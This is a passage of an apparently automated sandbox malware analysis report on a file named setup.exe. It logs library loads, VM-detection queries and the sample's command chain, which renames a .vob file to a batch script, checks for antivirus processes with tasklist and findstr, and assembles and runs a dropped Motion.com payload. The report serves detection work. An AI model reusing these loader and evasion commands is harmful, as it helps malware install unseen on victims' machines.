    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: setup.exeStatic file information: File size 1259091 > 1048576
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00405B93 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405B93

    Persistence and Installation Behavior

    barindex
    Drops PE files with a suspicious file extension
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\826825\Motion.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\826825\Motion.comJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
    Query firmware table information (likely to detect VMs)
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSystem information queried: FirmwareTableInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com TID: 7888Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com TID: 7888Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00405B6C FindFirstFileW,FindClose,0_2_00405B6C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040652D DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_0040652D
    Source: Amcache.hve.24.drBinary or memory string: VMware
    Source: Amcache.hve.24.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.24.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.24.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.24.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.24.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.24.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.24.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.24.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.24.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.24.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.24.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.24.drBinary or memory string: vmci.sys
    Source: Amcache.hve.24.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.24.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.24.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.24.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.24.drBinary or memory string: VMware20,1
    Source: Amcache.hve.24.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.24.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.24.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.24.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.24.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.24.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.24.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.24.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.24.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.24.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.24.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00405B93 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405B93
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.batJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 826825Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Mods.vobJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Previously" Mean Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 826825\Motion.com + Elephant + Diabetes + Severe + Tears + Slovakia + Laser + Vocal + Defend + Mixing 826825\Motion.comJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Fake.vob + ..\Shock.vob + ..\Examples.vob + ..\Why.vob + ..\Girl.vob + ..\Error.vob + ..\Protective.vob gJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\826825\Motion.com Motion.com gJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
